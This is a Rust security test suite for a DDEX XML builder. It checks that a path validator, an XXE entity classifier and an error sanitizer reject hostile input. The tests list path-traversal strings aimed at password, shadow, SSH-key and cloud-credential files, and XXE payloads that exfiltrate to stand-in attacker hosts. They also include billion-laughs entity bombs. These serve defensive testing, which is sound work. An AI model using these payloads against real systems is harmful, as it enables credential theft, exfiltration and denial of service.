use ddex_builder::security::{
create_entity, create_external_entity, create_parameter_entity, EntityClassifier, ErrorContext,
ErrorMode, ErrorSanitizer, PathValidator, SanitizerConfig,
};
use std::io::{Error, ErrorKind};
use std::path::Path;
use std::time::Instant;
#[cfg(test)]
mod security_integration_tests {
use super::*;
#[test]
fn test_path_validation_comprehensive() {
    println!("🛡️ Testing comprehensive path validation...");
    let validator = PathValidator::new();

    // Attack corpus: plain / URL-encoded / double-encoded / overlong-UTF-8
    // traversal, Unicode slash lookalikes, Windows device and UNC paths,
    // sensitive Unix files, and dotfile/config targets. Every one must fail
    // validation.
    let attack_paths = [
        "../../../etc/passwd",
        "..\\..\\..\\Windows\\System32\\config\\SAM",
        "./../../root/.ssh/id_rsa",
        "dir/../../etc/shadow",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "..%252f..%252f..%252fetc%252fpasswd",
        "..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
        "..\u{2044}..\u{2044}etc\u{2044}passwd",
        "..\u{FF0F}..\u{FF0F}etc\u{FF0F}passwd",
        "C:\\Windows\\System32\\drivers\\etc\\hosts",
        "\\\\?\\C:\\Windows\\System32\\config\\SAM",
        "\\\\localhost\\c$\\Windows\\System32\\config\\SAM",
        "//./C:/Windows/System32/config/SAM",
        "/proc/self/environ",
        "/dev/mem",
        "/etc/shadow",
        "/root/.ssh/authorized_keys",
        ".env",
        "config/database.yml",
        "settings.json",
        ".aws/credentials",
    ];
    for attack in attack_paths {
        assert!(
            validator.validate(attack).is_err(),
            "Path '{}' should be blocked but was allowed",
            attack
        );
    }

    // Ordinary relative paths must still be accepted.
    let allowed_paths = [
        "valid/file.xml",
        "data/music/track.mp3",
        "output/generated.xml",
        "temp/processing.json",
    ];
    for allowed in allowed_paths {
        assert!(
            validator.validate(allowed).is_ok(),
            "Safe path '{}' should be allowed",
            allowed
        );
    }
    println!("✅ Path validation comprehensive test passed");
}
#[test]
fn test_entity_classification_xxe_defense() {
    println!("🛡️ Testing entity classification XXE defense...");
    let mut classifier = EntityClassifier::new();

    // XXE payloads: external general entities over several URL schemes,
    // parameter entities used for DTD fetching / exfiltration, a
    // billion-laughs chain (lol .. lol5), and a quadratic-blowup chain
    // (a, b, c). Each payload is classified on its own.
    let xxe_payloads = [
        create_external_entity("xxe", "file:///etc/passwd"),
        create_external_entity("xxe", "http://attacker.com/evil.dtd"),
        create_external_entity("xxe", "ftp://evil.com/exfiltrate"),
        create_external_entity("xxe", "jar:http://evil.com/evil.jar!/"),
        create_parameter_entity("file", "file:///etc/passwd"),
        create_parameter_entity("dtd", "http://attacker.com/evil.dtd"),
        create_parameter_entity("exfil", "http://attacker.com/exfil?data=%file;"),
        create_entity(
            "lol",
            "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;",
        ),
        create_entity(
            "lol2",
            "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;",
        ),
        create_entity(
            "lol3",
            "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;",
        ),
        create_entity(
            "lol4",
            "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;",
        ),
        create_entity("lol5", "LOL"),
        create_entity("a", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"),
        create_entity("b", "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"),
        create_entity("c", "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;"),
    ];
    for payload in xxe_payloads {
        let chain = [payload];
        let verdict = classifier.validate_entity_chain(&chain);
        assert!(
            !verdict.is_safe,
            "XXE payload with entity '{}' should be blocked",
            chain[0].name
        );
        assert!(
            !verdict.errors.is_empty(),
            "XXE payload with entity '{}' should have errors",
            chain[0].name
        );
    }

    // Benign DDEX-style entities must classify as safe with no errors.
    let safe_entities = [
        create_entity("title", "Song Title"),
        create_entity("artist", "Artist Name"),
        create_entity("isrc", "USRC17607839"),
        create_entity("duration", "PT3M45S"),
    ];
    let verdict = classifier.validate_entity_chain(&safe_entities);
    assert!(verdict.is_safe, "Safe DDEX entities should be allowed");
    assert!(
        verdict.errors.is_empty(),
        "Safe DDEX entities should have no errors"
    );
    println!("✅ Entity classification XXE defense test passed");
}
#[test]
fn test_error_sanitization_no_leakage() {
    println!("🛡️ Testing error sanitization prevents information leakage...");

    // Production-mode sanitizer: correlation IDs and error codes on, internal
    // detail logging off, messages capped at 200 characters.
    let config = SanitizerConfig {
        mode: ErrorMode::Production,
        generate_correlation_ids: true,
        log_internal_details: false,
        max_message_length: 200,
        include_error_codes: true,
    };
    let mut sanitizer = ErrorSanitizer::with_config(config);

    // Each case: (scenario label, raw error, context, fragments that must
    // never appear in sanitized output). The fragment lists stay `vec!`
    // because their lengths differ, so arrays would not share one tuple type.
    let cases = [
        (
            "File path leakage",
            Error::new(
                ErrorKind::PermissionDenied,
                "Cannot access /home/admin/secrets.txt containing API keys",
            ),
            ErrorContext::FileRead,
            vec!["/home/admin", "secrets.txt", "API keys"],
        ),
        (
            "Network information leakage",
            Error::new(
                ErrorKind::ConnectionRefused,
                "Connection failed to 192.168.1.100:8080 (internal server)",
            ),
            ErrorContext::NetworkRequest,
            vec!["192.168.1.100", "8080", "internal server"],
        ),
        (
            "Memory address leakage",
            Error::new(
                ErrorKind::Other,
                "Segmentation fault at address 0x7fff5fbff000 in function parse_xml()",
            ),
            ErrorContext::XmlParsing,
            vec!["0x7fff5fbff000", "parse_xml"],
        ),
        (
            "Database connection leakage",
            Error::new(
                ErrorKind::ConnectionRefused,
                "Failed to connect to postgres://admin:FAKE_PASSWORD_123@db.internal.com:5432/prod",
            ),
            ErrorContext::DatabaseConnection,
            vec!["admin", "FAKE_PASSWORD_123", "db.internal.com", "5432", "prod"],
        ),
        (
            "API key leakage",
            Error::new(
                ErrorKind::PermissionDenied,
                "Authentication failed: api_key=FAKE_API_KEY_FOR_TESTING_ONLY",
            ),
            ErrorContext::Authentication,
            vec!["FAKE_API_KEY_FOR_TESTING_ONLY"],
        ),
    ];

    for (scenario, raw_error, context, forbidden) in cases {
        let sanitized = sanitizer.sanitize(raw_error, context);

        // Neither the short message nor the full rendering may leak.
        for fragment in forbidden {
            assert!(
                !sanitized.message.contains(fragment),
                "{}: Message should not contain '{}' but got: '{}'",
                scenario,
                fragment,
                sanitized.message
            );
            assert!(
                !sanitized.to_string().contains(fragment),
                "{}: Full output should not contain '{}' but got: '{}'",
                scenario,
                fragment,
                sanitized.to_string()
            );
        }

        // Sanitized output must still be actionable: traceable, coded, non-empty.
        assert!(
            !sanitized.correlation_id.is_empty(),
            "{}: Should have correlation ID",
            scenario
        );
        assert!(
            sanitized.code.is_some(),
            "{}: Should have error code",
            scenario
        );
        assert!(
            !sanitized.message.is_empty(),
            "{}: Should have non-empty message",
            scenario
        );
    }
    println!("✅ Error sanitization no leakage test passed");
}
#[test]
fn test_cross_platform_path_validation() {
    println!("🛡️ Testing cross-platform path validation...");
    let validator = PathValidator::new();

    // A 5000-character path for the length-limit case; built outside the
    // table so the remaining entries can stay string literals.
    let oversized = "A".repeat(5000);

    // (attack family, payload) pairs covering Windows, Unix, macOS and
    // byte-level tricks (NUL, control chars, Unicode homographs).
    let attacks = [
        ("Windows UNC", "\\\\evil.com\\share\\file.exe"),
        ("Windows device", "\\\\.\\pipe\\evil"),
        ("Windows alternate data stream", "file.txt:hidden.exe"),
        ("Windows reserved names", "CON.txt"),
        (
            "Windows drive traversal",
            "C:\\..\\..\\Windows\\System32\\cmd.exe",
        ),
        ("Unix proc filesystem", "/proc/self/mem"),
        ("Unix dev filesystem", "/dev/random"),
        ("Unix home traversal", "~/../../../etc/passwd"),
        ("Unix hidden files", ".bashrc"),
        ("macOS resource fork", "file.txt/..namedfork/rsrc"),
        ("macOS system path", "/System/Library/CoreServices/boot.efi"),
        ("macOS app bundle", "evil.app/Contents/MacOS/evil"),
        ("Null byte injection", "safe.txt\0../../etc/passwd"),
        ("Long path attack", oversized.as_str()),
        ("Control character", "file\x01name.txt"),
        ("Unicode homograph", "file\u{2044}name.txt"),
    ];
    for (family, payload) in attacks {
        assert!(
            validator.validate(payload).is_err(),
            "Platform attack '{}' with path '{}' should be blocked",
            family,
            payload
        );
    }
    println!("✅ Cross-platform path validation test passed");
}
#[test]
fn test_performance_impact_benchmark() {
    println!("⚡ Testing performance impact of security improvements...");
    const ITERATIONS: usize = 10000;

    // Each helper returns overhead relative to a trivial baseline; anything
    // at or above 5% (0.05) fails the test.
    let path_overhead = benchmark_path_validation(ITERATIONS);
    assert!(
        path_overhead < 0.05,
        "Path validation overhead too high: {:.2}%",
        path_overhead * 100.0
    );

    let entity_overhead = benchmark_entity_classification(ITERATIONS);
    assert!(
        entity_overhead < 0.05,
        "Entity classification overhead too high: {:.2}%",
        entity_overhead * 100.0
    );

    let sanitize_overhead = benchmark_error_sanitization(ITERATIONS);
    assert!(
        sanitize_overhead < 0.05,
        "Error sanitization overhead too high: {:.2}%",
        sanitize_overhead * 100.0
    );

    println!("✅ Performance impact test passed:");
    println!(" Path validation overhead: {:.2}%", path_overhead * 100.0);
    println!(
        " Entity classification overhead: {:.2}%",
        entity_overhead * 100.0
    );
    println!(
        " Error sanitization overhead: {:.2}%",
        sanitize_overhead * 100.0
    );
}
#[test]
fn test_integrated_security_workflow() {
    println!("🔒 Testing integrated security workflow...");

    // Exercise all three security layers in sequence: path validation,
    // entity classification, then sanitization of the resulting errors.
    let path_validator = PathValidator::new();
    let mut entity_classifier = EntityClassifier::new();
    let mut error_sanitizer = ErrorSanitizer::with_config(SanitizerConfig {
        mode: ErrorMode::Production,
        ..SanitizerConfig::default()
    });

    // 1) A traversal path is rejected...
    let malicious_path = "../../../etc/passwd";
    let path_verdict = path_validator.validate(malicious_path);
    assert!(path_verdict.is_err(), "Malicious path should be blocked");

    // ...and the raw rejection message (which embeds the offending path)
    // is scrubbed by the sanitizer.
    let raw_path_error = Error::new(
        ErrorKind::PermissionDenied,
        format!(
            "Path validation failed for {}: {:?}",
            malicious_path,
            path_verdict.err()
        ),
    );
    let sanitized_path_error = error_sanitizer.sanitize_security_error(raw_path_error);
    assert!(
        !sanitized_path_error.to_string().contains("etc/passwd"),
        "Sanitized path error should not contain sensitive path"
    );

    // 2) Hostile entities (external XXE plus a self-referential bomb) are
    // flagged...
    let malicious_entities = vec![
        create_external_entity("xxe", "file:///etc/passwd"),
        create_entity("bomb", "&bomb;&bomb;&bomb;&bomb;"),
    ];
    let entity_verdict = entity_classifier.validate_entity_chain(&malicious_entities);
    assert!(
        !entity_verdict.is_safe,
        "Malicious entities should be blocked"
    );

    // ...and the aggregated classifier errors are scrubbed as well.
    let raw_entity_error = Error::new(
        ErrorKind::InvalidData,
        format!(
            "Entity validation failed: {}",
            entity_verdict.errors.join(", ")
        ),
    );
    let sanitized_entity_error = error_sanitizer.sanitize_security_error(raw_entity_error);
    assert!(
        !sanitized_entity_error
            .to_string()
            .contains("file:///etc/passwd"),
        "Sanitized entity error should not contain sensitive entity reference"
    );

    // 3) Both sanitized errors stay traceable through correlation IDs.
    assert!(
        !sanitized_path_error.correlation_id.is_empty(),
        "Path error should have correlation ID"
    );
    assert!(
        !sanitized_entity_error.correlation_id.is_empty(),
        "Entity error should have correlation ID"
    );
    println!("✅ Integrated security workflow test passed");
}
#[test]
fn test_security_edge_cases() {
    println!("🔍 Testing security edge cases...");
    let validator = PathValidator::new();

    // Degenerate path inputs: empty, 10k characters, embedded NUL, and a
    // Unicode fraction-slash traversal. All must be rejected.
    assert!(validator.validate("").is_err(), "Empty path should be blocked");

    let oversized = "A".repeat(10000);
    assert!(
        validator.validate(&oversized).is_err(),
        "Very long path should be blocked"
    );

    assert!(
        validator.validate("safe.txt\0../../etc/passwd").is_err(),
        "Null byte attack should be blocked"
    );

    assert!(
        validator
            .validate("..\u{2044}..\u{2044}etc\u{2044}passwd")
            .is_err(),
        "Unicode normalization attack should be blocked"
    );

    // Build a 100-level reference chain level0 -> level1 -> ... -> level99,
    // where only the last entity carries a literal value; the classifier
    // must reject the chain.
    let mut classifier = EntityClassifier::new();
    let mut chain = Vec::new();
    for depth in 0..100 {
        let name = format!("level{}", depth);
        if depth == 99 {
            chain.push(create_entity(&name, "deep"));
        } else {
            chain.push(create_entity(&name, &format!("&level{};", depth + 1)));
        }
    }
    let verdict = classifier.validate_entity_chain(&chain);
    assert!(
        !verdict.is_safe,
        "Deeply nested entities should be blocked"
    );
    println!("✅ Security edge cases test passed");
}
/// Measures the relative cost of `PathValidator::validate` against a bare
/// filesystem existence probe over the same paths. Returns the fractional
/// overhead (0.10 = 10%), clamped at zero if validation is faster.
fn benchmark_path_validation(iterations: usize) -> f64 {
    // Representative mix of paths the validator accepts and rejects.
    let sample_paths = vec![
        "valid/path.xml",
        "another/valid/path.json",
        "../invalid/path.txt",
        "normal/file.mp3",
    ];

    // Baseline: one `exists()` probe per path per iteration.
    let baseline_start = Instant::now();
    for _ in 0..iterations {
        for sample in &sample_paths {
            let _ = Path::new(sample).exists();
        }
    }
    let baseline = baseline_start.elapsed();

    // Measured: full security validation of the same paths.
    let validator = PathValidator::new();
    let secured_start = Instant::now();
    for _ in 0..iterations {
        for sample in &sample_paths {
            let _ = validator.validate(sample);
        }
    }
    let secured = secured_start.elapsed();

    let overhead =
        (secured.as_nanos() as f64 - baseline.as_nanos() as f64) / baseline.as_nanos() as f64;
    overhead.max(0.0)
}
/// Measures the relative cost of `validate_entity_chain` against a trivial
/// pass that only touches each entity's name and value lengths. Returns the
/// fractional overhead, clamped at zero.
fn benchmark_entity_classification(iterations: usize) -> f64 {
    // Three benign DDEX-style entities form the chain under test.
    let entities = vec![
        create_entity("title", "Song Title"),
        create_entity("artist", "Artist Name"),
        create_entity("isrc", "USRC17607839"),
    ];

    // Baseline: read each entity without classifying it.
    let baseline_start = Instant::now();
    for _ in 0..iterations {
        for entity in &entities {
            let _ = entity.name.len() + entity.value.len();
        }
    }
    let baseline = baseline_start.elapsed();

    // Measured: classify the whole chain once per iteration.
    let mut classifier = EntityClassifier::new();
    let secured_start = Instant::now();
    for _ in 0..iterations {
        let _ = classifier.validate_entity_chain(&entities);
    }
    let secured = secured_start.elapsed();

    let overhead =
        (secured.as_nanos() as f64 - baseline.as_nanos() as f64) / baseline.as_nanos() as f64;
    overhead.max(0.0)
}
/// Measures the relative cost of `sanitize_io_error` against plain `format!`
/// rendering of the same errors. Returns the fractional overhead, clamped at
/// zero. Note the measured loop also pays for rebuilding each error, since
/// `sanitize_io_error` consumes its argument.
fn benchmark_error_sanitization(iterations: usize) -> f64 {
    let test_errors = vec![
        Error::new(ErrorKind::NotFound, "File not found"),
        Error::new(ErrorKind::PermissionDenied, "Permission denied"),
        Error::new(ErrorKind::InvalidData, "Invalid data"),
    ];

    // Baseline: format each error once per iteration.
    let baseline_start = Instant::now();
    for _ in 0..iterations {
        for error in &test_errors {
            let _ = format!("Error: {}", error);
        }
    }
    let baseline = baseline_start.elapsed();

    // Measured: rebuild an equivalent error from kind + message, then sanitize.
    let mut sanitizer = ErrorSanitizer::new();
    let secured_start = Instant::now();
    for _ in 0..iterations {
        for error in &test_errors {
            let rebuilt = Error::new(error.kind(), error.to_string());
            let _ = sanitizer.sanitize_io_error(rebuilt, ErrorContext::FileRead);
        }
    }
    let secured = secured_start.elapsed();

    let overhead =
        (secured.as_nanos() as f64 - baseline.as_nanos() as f64) / baseline.as_nanos() as f64;
    overhead.max(0.0)
}
}
/// Stress test: 1000 distinct sanitize/classify cycles must complete without
/// panicking, with the sanitizer's error store flushed periodically so its
/// internal state stays bounded during the run.
#[test]
fn test_security_memory_safety() {
    println!("🧠 Testing memory safety and resource cleanup...");
    let mut sanitizer = ErrorSanitizer::new();
    let mut classifier = EntityClassifier::new();
    for i in 0..1000 {
        let error = Error::new(ErrorKind::Other, format!("Test error {}", i));
        let _ = sanitizer.sanitize_io_error(error, ErrorContext::FileRead);

        let entity = create_entity(&format!("test{}", i), &format!("value{}", i));
        // A one-element slice is enough here; no need to heap-allocate a Vec
        // per iteration (clippy::useless_vec).
        let _ = classifier.validate_entity_chain(&[entity]);

        // Flush the stored errors every 100 iterations.
        if i % 100 == 0 {
            sanitizer.clear_error_store();
        }
    }
    println!("✅ Memory safety test passed");
}
/// Spawns ten tokio tasks, each with its own validator/classifier/sanitizer,
/// and checks that every component behaves correctly when exercised from
/// multiple concurrent tasks. Only compiled with the `async` feature.
#[cfg(feature = "async")]
#[tokio::test]
async fn test_security_concurrent_access() {
    use tokio::task;
    println!("🔄 Testing concurrent access to security components...");
    let handles: Vec<_> = (0..10)
        .map(|i| {
            task::spawn(async move {
                let validator = PathValidator::new();
                let mut classifier = EntityClassifier::new();
                let mut sanitizer = ErrorSanitizer::new();

                // A plain relative path must pass validation.
                let path_result = validator.validate(&format!("test/path/{}.xml", i));
                assert!(path_result.is_ok(), "Valid path should pass validation");

                // A benign entity must classify as safe. Use a one-element
                // slice instead of allocating a Vec (clippy::useless_vec).
                let entity = create_entity(&format!("test{}", i), &format!("value{}", i));
                let entity_result = classifier.validate_entity_chain(&[entity]);
                assert!(
                    entity_result.is_safe,
                    "Valid entity should pass classification"
                );

                // Every sanitized error carries a correlation ID.
                let error = Error::new(ErrorKind::Other, format!("Test error {}", i));
                let sanitized = sanitizer.sanitize_io_error(error, ErrorContext::FileRead);
                assert!(
                    !sanitized.correlation_id.is_empty(),
                    "Should have correlation ID"
                );
                i
            })
        })
        .collect();

    // Propagate any task panic to fail the test.
    for handle in handles {
        handle.await.expect("Task should complete successfully");
    }
    println!("✅ Concurrent access test passed");
}
/// Feeds deliberately garbage inputs (NULs, control bytes, emoji, BOM runs,
/// oversized strings) to all three security components; they must reject or
/// handle each input gracefully, never panic.
#[test]
fn test_security_malformed_input_handling() {
    println!("💥 Testing malformed input handling...");
    let validator = PathValidator::new();
    let mut classifier = EntityClassifier::new();
    let mut sanitizer = ErrorSanitizer::new();

    // Paths that are pure garbage — all must be rejected.
    let bom_string = "\u{FEFF}".repeat(100);
    let malformed_paths = vec![
        "\0\0\0\0",
        "\x01\x02\x03\x04",
        "🔥💀☠️",
        &bom_string,
    ];
    for path in malformed_paths {
        let result = validator.validate(path);
        assert!(result.is_err(), "Malformed path should be rejected");
    }

    // Degenerate entities: empty/NUL names and values, plus a 10k-char name
    // and a 100k-char value. The classifier must return a verdict, not crash.
    let malformed_entities = vec![
        create_entity("", ""),
        create_entity("\0", "value"),
        create_entity("name", "\0"),
        create_entity(&"A".repeat(10000), "value"),
        create_entity("name", &"A".repeat(100000)),
    ];
    for entity in malformed_entities {
        // One-element slice instead of allocating a Vec per entity
        // (clippy::useless_vec).
        let result = classifier.validate_entity_chain(&[entity]);
        assert!(
            !result.errors.is_empty() || result.is_safe,
            "Should either have errors or be safe, not crash"
        );
    }

    // Malformed error messages: sanitization must still produce a correlation
    // ID and a non-empty message for each.
    let long_message_string = "A".repeat(100000);
    let malformed_error_messages = vec![
        "",
        "\0\0\0",
        "\x01\x02\x03",
        &long_message_string,
    ];
    for msg in malformed_error_messages {
        let error = Error::new(ErrorKind::Other, msg);
        let sanitized = sanitizer.sanitize_io_error(error, ErrorContext::FileRead);
        assert!(
            !sanitized.correlation_id.is_empty(),
            "Should have correlation ID"
        );
        assert!(
            !sanitized.message.is_empty(),
            "Should have non-empty message"
        );
    }
    println!("✅ Malformed input handling test passed");
}